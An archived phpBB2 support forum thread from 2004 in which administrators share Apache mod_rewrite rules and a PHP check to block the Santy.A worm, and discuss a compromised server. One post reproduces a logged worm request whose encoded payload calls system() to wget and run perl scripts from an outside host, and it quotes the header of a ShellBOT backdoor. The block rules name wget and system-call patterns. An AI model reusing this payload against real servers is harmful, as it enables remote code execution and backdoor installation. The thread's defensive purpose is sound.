Apache forbidden rule for Santy.A worm

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
theanimewizard
Registered User
Posts: 646
Joined: Tue Jul 08, 2003 9:24 pm
Contact:

Post by theanimewizard » Sat Dec 25, 2004 12:28 am

i upgraged to 2.0.11...

and my host will be upgrading to 4.3.10 soon...

in the meantime, does the code u gave protect me from the explot?

rcardona
Registered User
Posts: 41
Joined: Fri Mar 26, 2004 3:57 am
Location: Austin, TX, USA

Post by rcardona » Sat Dec 25, 2004 12:42 am

You are mostly safe with PHPbb v2.0.11. What the rules will protect you from are generating wasted markup for bots and against the proof of concept exploit code for the PHP unserialize() memory heap exposure. I downloaded the PoC for the PHP bug, ran it against my server and came up with a rule to block it. I have not noticed anyone using the PoC code yet. The PHP bug can expose your dbuser and password and other sensitive data, so that is why you want to upgrade to PHP 2.0.11 as soon as you can.

CrazyTool
Registered User
Posts: 20
Joined: Sat Dec 25, 2004 2:13 am

Post by CrazyTool » Sat Dec 25, 2004 5:34 am

Just on the off-chance there's anyone desperately searching for a way to do this with their IIS box, just thought I'd post a link to my post about this here: http://www.phpbb.com/phpBB/viewtopic.ph ... 51#1366951

Basically a rewrite similar to that available with Apache - same flaws as pointed out with mod_rewrite (eg. next worm introduces just a minor change, it won't be effective), but hey, better than nothing.

computersOC
Registered User
Posts: 2528
Joined: Thu Dec 04, 2003 6:21 am
Location: New York
Contact:

Re: Apache forbidden rule for Santy.A worm

Post by computersOC » Sat Dec 25, 2004 7:29 am

rcardona wrote:

Code: Select all

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527
RewriteRule ^.*$	-	[F,L]


In my ACP, instead of showing all those IPs with forums they're in, it just shows Forum Index for all of the IPs.
http://www.computersOC.com - overclocking, P2P, broadband tweaks, ISP forums, more... Computer Building Help -- Overclocking Guide

Want us to install you a phpBB board or update your current one? Want mods/anti-spam mods installed? Moving to a new host? Check us out here.

Phineus1
Registered User
Posts: 64
Joined: Sat Nov 08, 2003 11:55 pm

Post by Phineus1 » Sun Dec 26, 2004 5:54 am

First, thanks Master and tanrek. And tho I had the robot.txt file and htaccess files set before coming here, thanks to rcardona for putting everybody on the scent. And thanks to phpbb for coming up with quick fixes.
What might have flooded your board is the (lately) very active google- or msn-bot, don't confuse them with the worm.


Fair enough. However, what I'm seeing is much more, I'd think, than a spider crawling the system. I have a ton of stuff like this in the access logs. Fact is, I have about 300 megs of logs filled with this junk.
66.70.113.210 - - [24/Dec/2004:06:19:17 -0800]
"GET /viewtopic.php?t=414&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%
252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr
(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%
252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(110)%252echr
(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%
252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(99)%252echr
(111)%252echr(109)%252echr(47)%252echr(98)%252echr(111)%252echr(116)%
252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr
(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(98)%
252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr
(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%
252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr
(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%
252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr
(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%
252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr
(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%
252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr
(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%
252e%2527 HTTP/1.0" 403 297 "-" "lwp-trivial/1.40"


The referers are this lwp-trivial thing, google, msn, and a couple others.
In spite of their names those worms are no living beings


The problem with viruses, of all types, is they proliferate and try to avoid detection. Perhaps not alive, but they sniff and probe. Is that the case with the most recent variant that we're all talking about here lately? I'm no expert in the field but I do know that had I allowed it to continue, whatever was going on, would've caused my server serious harm.

But let's hold this thought a moment.

Today, just now, I found in the /tmp directory a number of surprises.


In the tmp directory, are three subdirectories

.apache
.p
port


In the port directory are four files.

14568
35651
4000
65500


I'm only a hobbyist system administrator, but when I see files called bot.txt with stuff like this in it, I'm pretty sure it's a bad sign.
#!/usr/bin/perl
#
# ShellBOT - Atrix Team
#
# 0ldW0lf - oldwolf@atrix-team.org
# - www.atrix-team.org
# - www.atrix.cjb.net
#
# modificado por poerschke
# irc.gigachat.net #spykids
#
################ CONFIGURACAO #################################################################
my $processo = "/hsphere/shared/apache/bin/httpd -DSSL"; # Nome do processo que vai aparece no ps #



I also found a log file with this in it
~Thu Dec 23 18:06:47 :(Koasa!andrei@Microzoft.users.undernet.org) (hTTP): WwW.Cool-life.org/forum/ -updated!- Pt Totzi Hackerii
~Thu Dec 23 18:06:48 :(Koasa!andrei@Microzoft.users.undernet.org) (iNFO): New forum was made by microzoft team


And 347 files like this
-rw-r--r-- 1 apache apache 4687 Dec 24 00:26 adfkgnnodfijg
-rw-r--r-- 1 apache apache 19561 Dec 23 18:56 bot.txt
-rw-r--r-- 1 apache apache 19561 Dec 23 18:56 bot.txt.100
-rw-r--r-- 1 apache apache 19561 Dec 23 18:56 bot.txt.101
-rw-r--r-- 1 apache apache 19561 Dec 23 18:56 bot.txt.102
-rw-r--r-- 1 apache apache 19561 Dec 23 18:56 bot.txt.103
...
-rw-r--r-- 1 apache apache 12943 Dec 24 00:19 index.html.3
-rw-r--r-- 1 apache apache 12943 Dec 24 00:19 index.html.4
-rw-r--r-- 1 apache apache 12943 Dec 24 00:20 index.html.5
-rw-r--r-- 1 apache apache 12943 Dec 24 00:23 index.html.6
-rw-r--r-- 1 apache apache 12943 Dec 24 00:23 index.html.7
...
-rw-r--r-- 1 apache apache 2994 Dec 23 22:34 worm.txt.134
-rw-r--r-- 1 apache apache 2994 Dec 23 22:34 worm.txt.135
-rw-r--r-- 1 apache apache 2994 Dec 23 22:34 worm.txt.136
-rw-r--r-- 1 apache apache 2994 Dec 23 22:34 worm.txt.137
-rw-r--r-- 1 apache apache 2994 Dec 23 22:34 worm.txt.138



My apologies, but I deleted those files. What I should have done was tar them first. I still have the stuff in the three directories... one of which contains a "make" file. What I'd really like to do is find somebody I can hand this over too (who knows what they're doing) so that we might be able to track down who's behind it, if that's possible.

--------------

Is this the same thing everybody is getting, or is this something exclusive to my particular case? I really couldn't say, but I hate coincidences like this. I do know that I was getting too many connections messages which disabled the mysql server. I checked the access logs and saw this going on, so I shut down apache and ftp... which is probably what saved the server. Am I confusing things with the Santy.A worm ? Very likely, but I don't think I'm mistaking it for very active google- or msn-bots.

And please allow me to be perfectly clear, yes, I am asking a question here. Who would know how to interpret (what's left of) this data? Who would want to or be interested in doing it. Who can be trusted? I've stopped it for now, but I think it's important to head off future attacks. Even if they may not be directly related to phpbb... because it may not be the same thing, but it's certainly trying to hid behind it.

Thanks for any info and insights.

Phineus1
Registered User
Posts: 64
Joined: Sat Nov 08, 2003 11:55 pm

Post by Phineus1 » Sun Dec 26, 2004 6:11 am

One more thought. If a program is running on my system that is contributing to this problem, then by all means let's track it down, and terminate it asap. Then, let's use the data I still have to figure out how to stop it.

User avatar
tanrek
Registered User
Posts: 219
Joined: Mon Sep 27, 2004 1:46 pm
Location: Germany, Offenbach
Contact:

Post by tanrek » Sun Dec 26, 2004 9:16 am

Your server was hacked (either by hackers or by a worm) and a backdoor was installed. Please follow the to-do-list on the previous page.
Phineus1 wrote: Is this the same thing everybody is getting


Yes. There are a lot of different worms and hackers in the wild now. Most of them try to use the highlight exploit of phpBB, but others are utilizing other php vulnerabilities or vulnerabilities which arise from bad programming. The numerous appearance of worms in the logfiles looks frightening, but remember that hackers are still more dangerous, because they behave intelligent and thus they find securitiy issues which worms will not find.

If your scripts are safe you can ignore those attacks. If you must reduce traffic use the rewrite directive described in this thread, but remember that this is just a workaround, because the rewrite engine of apache has not the best reputation and it might open new vulnerabilities. To obtain reduction of traffic you can also restrict search engine robots (e.g. using robots.txt), but this measure will also reduce the popularity of your forum in the search engines.
Phineus1 wrote: Who would know how to interpret (what's left of) this data?


To identify your vulnerability you first have to identify the exact time of the successful attack (e.g. timestamp of backdoor files). Then analyze your logfiles what exactly happened in that minute.

Phineus1
Registered User
Posts: 64
Joined: Sat Nov 08, 2003 11:55 pm

Post by Phineus1 » Sun Dec 26, 2004 9:57 am

Please follow the to-do-list on the previous page.


Do you mean this?

http://www.phpbb.com/phpBB/viewtopic.ph ... 21#1362321

User avatar
tanrek
Registered User
Posts: 219
Joined: Mon Sep 27, 2004 1:46 pm
Location: Germany, Offenbach
Contact:

Post by tanrek » Sun Dec 26, 2004 10:11 am



Yes
Checking the entire webspace for installed backdoors (suspicious files) is very laborious. I know it but I have no better advice for you. Sorry. If you have a mirror of your webspace on your local pc you can check very fast and efficiently if something has changed on your server.

User avatar
Joe User
Registered User
Posts: 71
Joined: Mon Sep 13, 2004 9:56 am
Location: Germany
Name: Markus Kohlmeyer
Contact:

Post by Joe User » Sun Dec 26, 2004 2:44 pm

Here is another variant for mod_rewrite:

Code: Select all

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
HTH

The_Master
Registered User
Posts: 118
Joined: Fri Dec 28, 2001 2:21 am
Location: Germany

Post by The_Master » Sun Dec 26, 2004 5:20 pm

This is not meant to protect an insecure board, it will only filter some of the bot requests out.

And here is something for those of you who can't use mod_rewrite but want to cut down the amount of traffic/guests generated by the worm:

open common.php and search for:

Code: Select all

if (!isset($HTTP_POST_VARS) && isset($_POST))
{
	$HTTP_POST_VARS = $_POST;
	$HTTP_GET_VARS = $_GET;
	$HTTP_SERVER_VARS = $_SERVER;
	$HTTP_COOKIE_VARS = $_COOKIE;
	$HTTP_ENV_VARS = $_ENV;
	$HTTP_POST_FILES = $_FILES;

	// _SESSION is the only superglobal which is conditionally set
	if (isset($_SESSION))
	{
		$HTTP_SESSION_VARS = $_SESSION;
	}
}
add this directly after it:

Code: Select all

if ( strstr($HTTP_SERVER_VARS['HTTP_USER_AGENT'] ,'LWP') || strstr($HTTP_GET_VARS['highlight'], '%27')  )
{
	die("Hacking attempt");
}
Edit: Changed the code because there are LWP versions with a different user agent than the one I found in my apache access_log.

Edit2: This should now get every attempt to use the highlight exploit, hopefully without causing any other problems.

Edit3: Use this code instead, or change of strstr() to stristr() on the user-agent check, if you want to make it case insensitive:

Code: Select all

if ( stristr($HTTP_SERVER_VARS['HTTP_USER_AGENT'] ,'LWP') || strstr($HTTP_GET_VARS['highlight'], '%27')  )
{
	die("Hacking attempt");
}
Thanks to JKeats for informing me that the original check is case sensitive.

This is not meant to protect an insecure board, it will only filter some of the bot requests out.
Last edited by The_Master on Thu Dec 30, 2004 8:10 pm, edited 3 times in total.

usrbingeek
Registered User
Posts: 3
Joined: Sun Dec 26, 2004 5:24 pm

Post by usrbingeek » Sun Dec 26, 2004 5:28 pm

How do I combine my current .htaccess file (below) with this one?

Code: Select all

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]

Code: Select all

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} FrontPage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^Irvine [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus RewriteRule ^.* - [F,L] 
Last edited by usrbingeek on Sun Dec 26, 2004 5:44 pm, edited 1 time in total.

espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Post by espicom » Sun Dec 26, 2004 5:33 pm

open common.php and search for:


It is worth noting that the code being searched for does NOT exist in earlier versions. I can't check my 2.0.8 install anymore (it was updated to 2.0.11), but the .2 and .6 versions contain nothing like this.

User avatar
tanrek
Registered User
Posts: 219
Joined: Mon Sep 27, 2004 1:46 pm
Location: Germany, Offenbach
Contact:

Post by tanrek » Sun Dec 26, 2004 5:36 pm

usrbingeek wrote: How do I combine my current .htaccess file (below) with this one?


All but the last RewriteCond lines (per rule) must have [OR] at the end.

Please keep in mind that the Apache Rewrite Engine should be used only for a short time workaround, but not as lasting solution, because it could open new security issues.
Last edited by tanrek on Sun Dec 26, 2004 5:39 pm, edited 1 time in total.

The_Master
Registered User
Posts: 118
Joined: Fri Dec 28, 2001 2:21 am
Location: Germany

Post by The_Master » Sun Dec 26, 2004 5:38 pm

espicom wrote:
open common.php and search for:


It is worth noting that the code being searched for does NOT exist in earlier versions. I can't check my 2.0.8 install anymore (it was updated to 2.0.11), but the .2 and .6 versions contain nothing like this.


First read then think! I wrote it is meant to cut down the traffic and number of guests, not to protect you against anything. So you should upgrade first. I don't support ppl running outdated versions.

Locked

Return to “2.0.x Support Forum”